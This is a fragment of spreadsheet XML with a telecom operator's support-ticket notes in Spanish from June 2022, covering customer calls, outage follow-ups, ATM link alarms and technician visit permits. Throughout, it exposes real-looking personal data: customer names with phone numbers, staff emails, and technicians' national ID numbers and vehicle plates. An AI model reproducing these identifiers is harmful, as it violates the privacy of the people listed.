DE: WILLIAM GABRIEL SANAVRIA &lt;WILLIAM.SANAVRIA@CLARO.COM.GT&gt;ENVIADO: MARTES, 21 DE JUNIO DE 2022 14:40PARA: MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;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ASUNTO: ENLACE ALARMADO CON REINCIDENCIA CC_TYT_GT_ATM844
ESTIMADO CLIENTE,
DEBIDO A QUE SE HAN PRESENTADO ALARMAS RECURRENTES POR REINICIO EN EQUIPO CPE DEL ENLACE ABAJO DESCRITO, SERIAN TAN AMABLES DE INDICARNOS POR ESTE MEDIO SI CUENTAN CON UPS Y SI CUENTAN FAVOR VALIDAR QUE SE ENCUENTRE EN BUEN ESTADO.
TICKET: F4610588
ID: 47500798T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM844
UBICADO EN: ATM163 7 AVENIDA Y 5 CALLE ZONA 1 POPTUN PETEN AG. BANRURAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4610603</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRENDA RAMIREZ AL 59799974 INDICA QUE AL REALIZAR LLAMADAS SE CORTAN AL INGRESAR A LA PLANTA | SE NOTIFICA A GESTOR **
-ID 1001389924
**</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE MANUEL MENDEZ Y BRENDA RAMIREZ, SE REALIZAN VARIAS LLAMADAS DE PRUEBA AL GDN Y ESTAS YA NO SE CORTAN. COMENTAN QUE YA HAN RECIBIDO VARIAS LLAMADAS Y YA ESTÁ FUNCIONANDO DE MANERA NORMAL. CLIENTE AUTORIZA EL CIERRE DEL CASO. ID: 1001401985, 1001401985</t>
  </si>
  <si>
    <t>F4610604</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LILIAN TERESA SOZA AL 31703965 SE CONTACTA A CLIENTE || SE TRATA DE CONTACTAR A GESTOR PERO NO SE OBTIENE RESPUESTA || SE LE INDICA A CL QUE SE LE DEVOLVERA LLAMADA PARA HACER LAS PRUEBAS**
-ID 1001400333
**</t>
  </si>
  <si>
    <t>F4610609</t>
  </si>
  <si>
    <t>EN LLAMADA CON CLIENTE  CINTIA MORALES NÚMERO :  40081394   / 30412098, QUIEN INDICA QUE EN SITIO SI CUENTA CON ENERGÍA ELECTRICA , ADICIONAL CLIENTE, COMENTA QUE NO TIENE CONOCIMIENTO SOBRE LOS EQUIPOS Y QUE ESTOS SE ENCUENTRAN EN UN LUGAR ALTO, POR LO CUAL NO LOS LOGRA ALCANZAR, CLIIENTE DESEA QUE SE LE ENVIE LA VISITA TÉCNICA LO ANTES POSIBLE
1001405040
COLA:
NOMBRE: A: 40081394
NÚMERO: 40081394
DURACIÓN: 0:07:02
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 40081394
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 21/06/2022 11:37:43</t>
  </si>
  <si>
    <t>F4610610</t>
  </si>
  <si>
    <t>SE TIENE RESPUESTA DEL CLIENTE VIA SKYPE DONDE CONFIRMA PROBLEMA DE ENERGIA EN EL PR.</t>
  </si>
  <si>
    <t>F4610611</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA SOLICITUD DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 8:39
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || FEDECACES DE R.L. || F4610611
BUEN DÍA
     SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
FEDECACES DE R.L.
MP232603023SSV
SD1137153 - F4610611
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>CL EVELYN INDICA QUE SE LLAME MAÑANA A LAS 8:30 PARA VALIDAR COMENTA QUE ESTARAN REALIZANDO PRUEBAS--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN GOMEZ 25553546 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE PERO SOLICITA RFO
-ID 1001561173</t>
  </si>
  <si>
    <t>F4610615</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE FUE POR CAUSA DE ENERGIA COMERCIAL EN PUNTO REMOTO, SE HABLO CON MOISES PACAJO.
1001477807
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:21
ESTADO: CONECTADA
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 21/06/2022 15:13:02</t>
  </si>
  <si>
    <t>F4610628</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JEFE DE TIENDA / 58306935 CONTESTA EL SEÑOR DAVID GONZALEZ INDICA QUE YA ESTA EN SITIO Y QUE YA ESTAN TRABAJANDO LOS TECNICOS **
-ID 1001571432
**</t>
  </si>
  <si>
    <t>F4610629</t>
  </si>
  <si>
    <t>--- WALTER ANIBAL REYES CLIENTE), CONFIRMA SERVICIO, AUTORIZA EL CIERRE, SE INFORMA A CNOC PROACTIVO POR SKYPE.---
RESULTADO: LLAMADA HECHA
NOMBRE: 45787911
NÚMERO: 45787911
INICIO: HOY, 16:41
FIN: HOY, 17:06
DURACIÓN: 24:55
ID DE LLAMADA: 1001505380
...</t>
  </si>
  <si>
    <t>F4610630</t>
  </si>
  <si>
    <t>WILLIAM HIDALGO-56317557  SE TIENE EN LINEA ## INDCAI QEU YA TODO OK ### VALIDA CIERRE##
1001393829
COLA:
NOMBRE: A: 56317557
NÚMERO: 56317557
DURACIÓN: 0:01:39
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 56317557
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 21/06/2022 11:04:13</t>
  </si>
  <si>
    <t>F4610632</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE LORENZANA AL 56281545 - 24714679  INDICA QUE POR EL MOMENTO NO PUEDE REALIZAR PRUEBAS YA QUE SE QUEDA SIN SERVICIO SE TENIA EN LINEA CON CLIENTE PERO SE CORTA LLAMADA || SE INTENTA NUEVAMENTE Y NO RESPONDE **
-ID 1001425630 - 1001425844  - 1001429102
**</t>
  </si>
  <si>
    <t>F4610633</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUDITH CAAL AL 54421517 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001431708
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDI RODRIGUEZ 33981687 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001594224</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDI RODRIGUEZ 33981687 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA PARA LAS 10:00 HRS
-ID 1001555112</t>
  </si>
  <si>
    <t>F4610637</t>
  </si>
  <si>
    <t>F4610644</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE  ALVARO HERRERA 70739113 PERO NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 1001613192
**</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE  ALVARO HERRERA 70739113 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001577204</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO HERRERA 70739113 PERO NO RESPONDE
-ID 1001829492</t>
  </si>
  <si>
    <t>**SE LLAMA A CL ALVARO HERRERA 70739113 CLIENTE SOLICITA QUE SE LE LLAME PARA REALIZAR PRUEBAS YA QUE INDICA QUE EL PROBLEMA REPORTADO ES DE CONFIGURACION QUE NO PODIA LLEGAR A LOS EQUIPOS Y QUE AHORITA YA NO ESTA EN OFICINA PERO QUE SOLICITA SE LE DE SEGUIMIENTO MAÑANA A PARTIR DE LAS 7:30 AM **
-ID 1001492008
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ALVARO HERRERA AL 70739113  NO RESPONDE SE INTENTARA LUEGO **
-ID 1001433921
**</t>
  </si>
  <si>
    <t>F4610651</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JHONATAN CANNA 58374247 MENCIONA QUE AUN NO HAN REALIZADO, SE REALIZA LLAMADA DE PRUEBA Y RESPONDE SEÑORITA(NO BRINDA NOMBRE) PERO CONFIRMA LLAMADAS SALIENTES Y ENTRANTES
-ID 1001691270 - 1001691992</t>
  </si>
  <si>
    <t>F4610655</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JEFERSON PEREZ 62982387 MENCIONA QUE PERSISTE EL INCNVENIENTE CON EL ANCHO DE BANDA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001430493</t>
  </si>
  <si>
    <t>F4610658</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 NO RESPODE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001414350
**</t>
  </si>
  <si>
    <t>F4610660</t>
  </si>
  <si>
    <t>CLIENTE JOSE ALVARENGA 77012297INDICA QUE HOY POR LA TARDE ESTARÁ LLEGANDO EL PROVEEDOR DE LA PBX PARA REVISAR SU EQUIPO SOLICITA QUE SE DEJE ABIERTO EL TICKET POR SI NECESITE ALGUN APOYO O PARA VALIDAR EL FUNCIONAMIENTO. SOLICITA SE LE LLAME A LAS 14:30 HORAS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4610664</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ELVIS DE LEON 47124247 NO RESPONDE ENVIA A BUZON *
-ID 1001404572
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE MOLINA AL 42418536 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001405197
**</t>
  </si>
  <si>
    <t>F4610672</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. NELSON AL 31925430 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001437588
**</t>
  </si>
  <si>
    <t>F4610680</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. ING DOUGLAS RECINOS 78413904 SOLICITO APLICAR LA SIGUIENTE RUTA ESTATICA Y AUMENTAR EL SEGMENTO LAN A /24, SE APLICO LO SOLICITADO, CLIENTE SOLICITA VALIDAR MAÑANA 9:00 AM
[IP2026341]UNDO IP ROUTE-STATIC 10.65.10.0 255.255.255.0 172.17.94.2 DESCRIPTION FIREWALL
[IP2026341]IP ROUTE-STATIC 10.65.10.0 255.255.255.0 172.17.94.252 DESCRIPTION FIREWALL
[IP2026341]
[IP2026341]INT VL1
[IP2026341-VLANIF1]UNDO IP ADDRESS 172.17.94.253 255.255.255.128
[IP2026341-VLANIF1]IP ADDRESS 172.17.94.253 255.255.255.0
[IP2026341-VLANIF1]</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DOUGLAS RECINOS AL 78413904 INDICA QUE ESTARA RESPONDIENDO EL CORREO YA QUE  NECESITA SABER EN QUE SEGMENTO  QUEDO EL EQUIPO CLIENTE INDICA QUE RESPONDIO EL CORREO INDICANDO || SE NOTIFICA A GESTOR**
-ID 1001438354
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ING DOUGLAS RECINOS 78413904 INDICA QUE QUIERE SABER EN QUE SEGMENTACION QUEDO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001012814  - 2001014235
**</t>
  </si>
  <si>
    <t>F4610687</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CLAUDIA CUELLAR 77869632 PARA REALIZAR PRUEBAS, PERO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CLAUDIA CUELLAR 77869632 PARA REALIZAR PRUEBAS PERO NO SE TIENE RESPUESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CLAUDIA CUELLAR 77869632 QUIEN NOS CONFIRMA SERVICIO OPERATIVO Y NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4610692</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON ZARAT AL 30164447 INDICA QUE ESTA EN SITIO SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001449731
**</t>
  </si>
  <si>
    <t>F4610693</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MONTANO 76963351 SE CONTACTA A CLIENTE SE TRATA DE CONTACTAR A GESTOR PERO NO SE OBTIENE RESPUESTA || SE LE INDICA A CL QUE SE LE DEVOLVERA LA LLAMADA Y SE NOTIFICA A GESTOR **
-ID 1001453832
**</t>
  </si>
  <si>
    <t>###SE COORDINA CON CLIENTE CARLOS MONTANO  VISITA PARA MAÑANA 23/06/2022 A LAS 9 AM PARA PODER REVISAR EL CPE QUE ADMINISTRAN ELLOS Y SIEMPRE QUIEREN SEA EN CONJUNTO CON PERSONAL DE CLARO##
SE PROGRAMA WO SEGUN SOLICITUD DEL CLIENTE
1001626860
COLA:
NOMBRE: A: 50376963351
NÚMERO: 50376963351
DURACIÓN: 0:02:30
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50376963351
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 22/06/2022 11:32:40</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 21 DE JUNIO DE 2022 16:38
PARA: JEFE.OPERACIONES@CAJASANVICENTE.COM &lt;JEFE.OPERACIONES@CAJASANVICENTE.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | ID1026350SV |CAJA DE CREDITO SAN VICENTE | EN CENTRO COMERCIAL LAS CASCADAS, LOCAL 144 Y 146, CARRETERA PANAMERICANA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO ID1026350SV |CAJA DE CREDITO SAN VICENTE   | EN CENTRO COMERCIAL LAS CASCADAS, LOCAL 144 Y 146, CARRETERA PANAMERICANA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
DUI                              CODIGO                    EMPLEADO
00936126-7                  4799           MARIO ERNESTO CRUZ MARQUEZ
00354722-1                  4378           RONAL MOREL CRESPIN
00157708-4                  4690           ABRAHAM SAMUEL PEREZ
00580847-9                  2181           CARLOS EDUARDO GOMEZ ZELEDON
02878871-1                  2437           JOSE ALFREDO JIMENEZ
03245714-4                  8787           ADAN ERNESTO GONZALEZ
01968544-3                  9407           WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2                  4605           JOSE SALVADOR PORTILLO VELASQUEZ
04086816-7                  12404         GERARDO ANTONIO MINERO
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4610698</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE VALIDACION:
SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI003121 ::: "HIGHT LATENCY &amp; PACKET LOSS"</t>
  </si>
  <si>
    <t>F4610702</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 42106010 RESPONDE NATY MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001428704</t>
  </si>
  <si>
    <t>F4610706</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  PAULO CRUZ 59518788  MENCIONA QUE PERSISTE EL INCONVENIENTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001434362</t>
  </si>
  <si>
    <t>F4610709</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL CRUZ SANCHEZ 82386140 SE BRINDA RETROALIMENTACION **
-ID 1001458137
**</t>
  </si>
  <si>
    <t>F4610718</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ETX-1 Y ASMI54 ALARMADOS, PROCEDE A REINICIARLOS PERO EQUIPOS CONTINUAN ALARMADOS, CLIENTE SOLICITA QUE LA VISITA SEA PARA EL DIA DE MAÑANA A LAS 9 AM. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CINTIA GAROZA 42160656 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001600548</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE CINTIA GAROZA 42160656 COMENTA QUE NO SE ENCUENTRA EN EL SITIO, SOLICITA SE LE LLAME A JENIFER DIAZ 42120588 ID: 1001438686</t>
  </si>
  <si>
    <t>F4610729</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GEOVANI ROLDAN 42178477 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001437731</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  GEOVANI ROLDAN 42178477 INDICA QUE YA REINICIO EQUIPOS PERO NO LEVANTO EL SERVICIO SE SOLICITAN DATOS PARA VISITA PERO SOLICITA QUE SE LE LLAME EN 10 MIN PARA BRINDARLOS**
ID 1001419046
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  GEOVANI ROLDAN AL 42178477 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
- ID 1001500729
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  GEOVANI ROLDAN AL 42178477 Y BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 9:00 AM A 20:00  HRS
GESTION DE PERMISOS:  SOLO IDENTIFICADOS
DIRECCION: KM 205 CARRETERA A SAN MARCOS CC INTERPLAZA XELA SEGUNDO NIVEL LOCALES C1 Y C2 LA ESPERANZA QUETZALTENANGO
ATENDERA EN SITIO: CAROLINA 47179672</t>
  </si>
  <si>
    <t>F4610737</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA SR. FERNANDO AYALA INFORMA QUE SE ENCUENTRA EN LA CENTRAL, Y ESTARA VALIDANDO CON PUNTO REMOTO, TOMAR EN CUENTA QUE SE OBSERVA UN FW FORTINET ASOCIADO EN SU LAN, SE EN 30 MINS HORA PARA VALIDAR.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO AYALA AL 42575055  NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001499044
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BAUDILIO MIRANDA 50144330   PERO NO RESPONDE
-ID 1001439520</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO AYALA AL 42575055  NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001490737
**</t>
  </si>
  <si>
    <t>F4610740</t>
  </si>
  <si>
    <t>***SE LLAMA A  CLIENTE CRISTINA PUTCHIE AL 85106102 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO**
-ID 1001614790
**</t>
  </si>
  <si>
    <t>F4610756</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LOURDES LORENA ROSA AL 99011548 NO RESPONDE || SE INTENTARA LUEGO PARA CONFIRMAR DATOS DE VISITA **
-ID 1001445505
**</t>
  </si>
  <si>
    <t>F4610757</t>
  </si>
  <si>
    <t>SE LLAMA A EVER PERO NO RESPONDE.ENVIA  BUZON
SE LLAMA A CLIENTE PARA CONSULTAR MAS DETALLES DE INCONVENIENTE A NIVEL WIFI</t>
  </si>
  <si>
    <t>F4610760</t>
  </si>
  <si>
    <t>CLIENTE ESTEFANI GOMEZ 41949623 VALIDA QUE EL SERVICIO SE ENCUENTRA FUNCIONANDO, SE LE COMENTA QUE SE TUVO UNA FALLA GENERAL QUE AFECTÓ SU E1. CLIENTE REALIZA PRUEBAS DE LLAMADAS ENTRANTES Y SALIENTES Y VALIDA EL E1 ACTIVO. Y AUTORIZA EL CIERRE DEL CASO. ID: 1001434309</t>
  </si>
  <si>
    <t>F4610763</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONEL MARTINEZ 78602586 MENCIONA QUE ESTA PRESENTANDO PROBLEMA CON EL DHCP
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001441322</t>
  </si>
  <si>
    <t>F4610778</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE GUARDIA 42690926 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001462268</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSE GUARDIA 42690926 MENCIONA QUE NO SE ENCUENTRA EN PR PARA REALIZAR PRUEBAS POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 1001438374</t>
  </si>
  <si>
    <t>F4610795</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO CASTILLO 30442041   QUIEN SOLICITA LLAMADA PARA MAÑANA A LAS 10:00 HRS VALIDAR EL FUNCIONAMIENTO
-ID 1001831631</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO CASTILLO AL 30442041  INDICA QUE POR EL MOMENTO ESTA ESTABLE EL SERVICIO PERO SOLICITA QUE SE LE LLAME MAÑANA A LAS 10:00 AM NUEVAMENTE **
-ID 1001506894
**</t>
  </si>
  <si>
    <t>F4610798</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA QUE NOS APOYE CON VALIDAR SI SE TIENE PROBLEMA DE ENERGIA O MANTENIEMTO EN EL PR.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MARTES, 21 DE JUNIO DE 2022 16:5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636
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM36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0798
ID: 47502436T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3636
UBICADO EN: CAJERO 3636 C.C. PARADOR, KM. 34.5 RUTA 10 C.C. PARADOR SANTA LUCIA MILPAS ALTAS, SACATEPEQUEZ
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.  SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES &lt;CARLOSI.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 10:15
PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
ASUNTO: RE: [SOLICITUD :##RE-764068##] : ALARMA DEL CAJERO: CC_TYT_GT_ATM3636
BUEN DÍA ESTIMADOS.
SOLICITANDO SU APOYO CON ENVIAR SUPERVISOR AL CAJERO YA QUE ÚNICAMENTE ESTA OPERATIVO POR EL ENLACE REDUNDANTE(3G), SE OBSERVA QUE SE TIENE INTERFAZ ETHERNET 0/1 CAÍDA, VALIDAR LOS EQUIPOS Y CONEXIONES DEL ENLACE PRINCIPAL.
SNMP OPERSTATUS:
INTERFACE            OPERSTATUS
ETHERNET0/0          UP
ETHERNET0/1          DOWN
ETHERNET0/2          DOWN
ATM0/0               DOWN
CELLULAR1/0          UP
CELLULAR1/1          UP
PPP10                UP
TNIP10               UP
TNIP20               UP
LOOPBACK5            UP
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4610800</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR CARDONA 33717765 MENCIONA QUE ENVIARON LAS IMAGENES AL WHATSAPP 42105135
-ID 1001485403</t>
  </si>
  <si>
    <t>F4610801</t>
  </si>
  <si>
    <t>CLIENTE SR. ABNER CONTRERAS 59368436 REALIZA PRUEBAS DE PRIMER NIVEL, CONFIRMA EQUIPO ENCENDIDO, APLICO REINICIO, VALIDA CONEXIONES PERO ENLACE NO LEVANTA. SE PROCEDE A SOLICITAR APOYO DE PLEX.</t>
  </si>
  <si>
    <t>SE REALIZA LLAMADA CON CLIENTE  ABNER CONTRERAS NÚMERO 59368436 , QUIEN INDICA QUE YA SE TIENE LOS PERMISOS AUTORIZADOS , Y SOLICITA QUE SE PUEDA COORDINAR LA VISITA PARA EL DIA DE MAÑANA A LAS  10:00 AM
1001506562
COLA:
NOMBRE: A: 59368436
NÚMERO: 59368436
DURACIÓN: 0:01:32
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 59368436
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 21/06/2022 16:47:54</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ABNER CONTRERAS 59368436 MENCIONA PARA CONFIRMAR VISITA EL DIA DE MAÑANA A LAS 10:00 HRS
CLIENTE SOLICITA SI SE PUEDE LLEGAR MAS TENPRANO MUCHO QUE MEJOR
-ID 1001508541</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ABNER CONTRERAS 59368436 SOLICITA TIEMPO YA QUE NO SE ENCUENTRA EN SU OFICINA ....</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ABNER CONTRERAS/CLIENTE; SE LE INDICA QUE SE LE ENVIÓ DATOS DE LOS POSIBLES TÉCNICOS QUE IRÁN, NO VAN A IR TODOS; INDICA QUE NOS CONTESTARÁ A LA BREVEDAD.</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE , SOICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 15:21
PARA: ACONTRERAS@MINEX.GOB.GT &lt;ACONTRERAS@MINEX.GOB.GT&gt;; LMENDOZA@MINEX.GOB.GT &lt;LMENDOZA@MINEX.GOB.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 889500002T | MINISTERIO DE RELACIONES EXTERIORES..
BUENA  TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO .
DIRECCIÓN:   INTERNET_2 AVENIDA 4-17 ZONA 10, GUATEMALA, GUATEMALA
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
NOMBRE	IBM	VEHICULO	PLACA	NO. ORDEN	DPI
JUAN ALBERTO TRUJILLO ORTIZ 	732334	NISSAN MARCH	P-037JNR	A-782	2487190760115
MARLON ENRIQUE MUÑOZ ORELLANA  	652515	NISSAN MARCH	P-173JFM	A-864	1582465001801
DANIEL ENRIQUE MONTENEGRO CARACUN 	659473	NISSAN MARCH	P-617GTV	A-699	2414544250101
EDGAR DANIEL GOMEZ MENDEZ 	589058	NISSAN MARCH	P-121JNR	A-828	1628972431401
MILTON ENRIQUE SALAZAR PÉREZ 	725586	NISSAN MARCH	P-154JNR	A-871	2626487840101
PEDRO EDUARDO TOT MARTINEZ 	739764	NISSAN SEDAN	P-055GLD	A-636	1681348100101
JUAN JOSE RODRIGUEZ PAZ  	217826	NISSAN MARCH	P-740GTV	A-698	2494432600208
